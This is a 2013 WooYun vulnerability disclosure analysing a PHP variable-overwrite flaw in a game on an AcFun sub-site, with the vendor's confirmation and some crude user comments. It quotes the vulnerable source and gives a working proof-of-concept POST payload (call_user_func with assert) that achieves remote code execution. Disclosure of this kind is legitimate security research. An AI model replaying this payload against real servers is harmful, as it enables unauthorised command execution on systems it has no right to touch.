当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-023693

漏洞标题:ACFUN分站再次GETSHELL变量覆盖漏洞分析与利用

相关厂商:杭州游趣网络有限公司

漏洞作者: N1ghtBird

提交时间:2013-05-14 08:36

修复时间:2013-06-28 08:37

公开时间:2013-06-28 08:37

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-05-14: 细节已通知厂商并且等待厂商处理中
2013-05-14: 厂商已经确认,细节仅向厂商公开
2013-05-24: 细节向核心白帽子及相关领域专家公开
2013-06-03: 细节向普通白帽子公开
2013-06-13: 细节向实习白帽子公开
2013-06-28: 细节向公众公开

简要描述:

最近在学代码审计..找个软柿子下手= 3 =.
感谢@t00000by57 提供的利用思路.

详细说明:

但常在河边走哪有不湿鞋?extract + global早晚是要出问题的..
直接进入正题:
\include\common.inc.php -Line12

require GAME_ROOT.'./include/global.func.php';
error_reporting(E_ALL);
set_error_handler('gameerrorhandler');
$magic_quotes_gpc = get_magic_quotes_gpc();
extract(gstrfilter($_COOKIE));
extract(gstrfilter($_POST));
$_GET = gstrfilter($_GET);
$_REQUEST = gstrfilter($_REQUEST);
$_FILES = gstrfilter($_FILES);//哈?
require GAME_ROOT.'./config.inc.php';


后引入config避免覆盖重要变量.
gstrfilter过滤:
\include\global.inc.php -Line48

function gstrfilter($str) {
if(is_array($str)) {
foreach($str as $key => $val) {
$str[$key] = gstrfilter($val);
}
} else {
if($GLOBALS['magic_quotes_gpc']) {
$str = stripslashes($str);
}
$str = str_replace("'","",$str);//屏蔽单引号'
$str = str_replace("\\","",$str);//屏蔽反斜杠/
$str = htmlspecialchars($str,ENT_COMPAT);//转义html特殊字符,即"<>&
}
return $str;
}


重要变量靠'现取现用'再加上过滤就可以从一定程度上避免因为偷懒拼接sqlquery产生的问题了..至少在大部分代码中没问题..
关键在这里:
\command.php -Line3

require './include/common.inc.php';
//$t_s=getmicrotime();
//require_once GAME_ROOT.'./include/JSON.php';
require GAME_ROOT.'./include/game.func.php';
require config('combatcfg',$gamecfg);


\command.php -Line92

if($mode !== 'combat' && $mode !== 'corpse' && strpos($action,'pacorpse')===false && $mode !== 'senditem'){
$action = '';
}
if($command == 'menu') {
$mode = 'command';
$action = '';
} elseif($mode == 'command') {
if($command == 'move') {
include_once GAME_ROOT.'./include/game/search.func.php';
move($moveto);
if($coldtimeon){$cmdcdtime=$movecoldtime;}
} elseif($command == 'search') {
include_once GAME_ROOT.'./include/game/search.func.php';
search();
if($coldtimeon){$cmdcdtime=$searchcoldtime;}
} elseif(strpos($command,'itm') === 0) {
include_once GAME_ROOT.'./include/game/item.func.php';
$item = substr($command,3);
itemuse($item);
if($coldtimeon){$cmdcdtime=$itemusecoldtime;}
} elseif(strpos($command,'rest') === 0) {
if($command=='rest3' && !in_array($pls,$hospitals)){
$log .= '<span class="yellow">你所在的位置并非医院,不能静养!</span><br>';
}else{
$state = substr($command,4,1);
$mode = 'rest';
}
} elseif($command == 'itemmain') {
$mode = $itemcmd;
} elseif($command == 'song') {
$sname=trim(trim($art,'【'),'】');
include_once GAME_ROOT.'./include/game/song.inc.php';
//$log.=$sname;
sing($sname);
}elseif($command == 'sync') {
include_once GAME_ROOT.'./include/game/special.func.php';
syncro($sp_cmd);
$mode='command';
}elseif($command == 'special') {
if($sp_cmd == 'sp_word'){
include_once GAME_ROOT.'./include/game/special.func.php';
getword();
$mode = $sp_cmd;
}elseif($sp_cmd == 'sp_adtsk'){
include_once GAME_ROOT.'./include/game/special.func.php';
adtsk();
$mode = 'command';
}elseif($sp_cmd == 'sp_pbomb'){
$mode = 'sp_pbomb';
}elseif($sp_cmd == 'sp_weapon'){
include_once GAME_ROOT.'./include/game/special.func.php';
weaponswap();
$mode = 'command';
if($coldtimeon){$cmdcdtime=$weaponswapcoldtime;}
}elseif($sp_cmd == 'oneonone'){
$mode='oneonone';
}elseif($sp_cmd == 'sp_skpts'){
include_once GAME_ROOT.'./include/game/clubskills.func.php';
calcskills($skarr);
$p12[1]=1; $p12[2]=2;
$mode='sp_skpts';
}else{
$mode = $sp_cmd;
}

} elseif($command == 'team') {
include_once GAME_ROOT.'./include/game/team.func.php';
if($teamcmd == 'teamquit') {
teamquit();
} else{
teamcheck();
}
}
//省略一部分..直接进入最后逻辑
} elseif($mode == 'senditem') {
include_once GAME_ROOT.'./include/game/battle.func.php';
senditem();
} elseif($mode == 'combat') {
include_once GAME_ROOT.'./include/game/combat.func.php';
combat(1,$command);
} elseif($mode == 'rest') {
include_once GAME_ROOT.'./include/state.func.php';
rest($command);
// } elseif($mode == 'chgpassword') {
// include_once GAME_ROOT.'./include/game/special.func.php';
// chgpassword($oldpswd,$newpswd,$newpswd2);
// } elseif($mode == 'chgword') {
// include_once GAME_ROOT.'./include/game/special.func.php';
// chgword($newmotto,$newlastword,$newkillmsg);
} elseif($mode == 'corpse') {
include_once GAME_ROOT.'./include/game/itemmain.func.php';
getcorpse($command);
} elseif($mode == 'team') {
include_once GAME_ROOT.'./include/game/team.func.php';
$command($nteamID,$nteamPass);//<----------
}


team.func.php中存在两个方法,建立队伍function teammake($tID,$tPass)和加入队伍 function teamjoin($tID,$tPass),依靠$command传来的指令选择,但是感觉像是程序员在偷懒的时候忘记了上面extract解包?

漏洞证明:

构造请求:
$_POST['mode']='team',
$_POST['command']='call_user_func',
$_POST['nteamID']='assert',
$_POST['nteamPass']='phpinfo()'。

20130514032312.png


修复方案:

别偷懒..

版权声明:转载请注明来源 N1ghtBird@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-05-14 09:19

厂商回复:

已向大逃杀通报

最新状态:

暂无


漏洞评价:

评论

  1. 2013-05-14 09:05 | Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)

    老搞acfun,等着收offer?

  2. 2013-05-14 09:30 | N1ghtBird ( 普通白帽子 | Rank:104 漏洞数:21 | _(:з」∠)_)

    人家不要咱...(

  3. 2013-05-14 09:53 | 某因幡 ( 实习白帽子 | Rank:38 漏洞数:7 | 兔子一只。)

    猴子表示送香蕉还是送基佬?

  4. 2013-06-14 21:12 | 基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)

    猴基也被暴后庭了..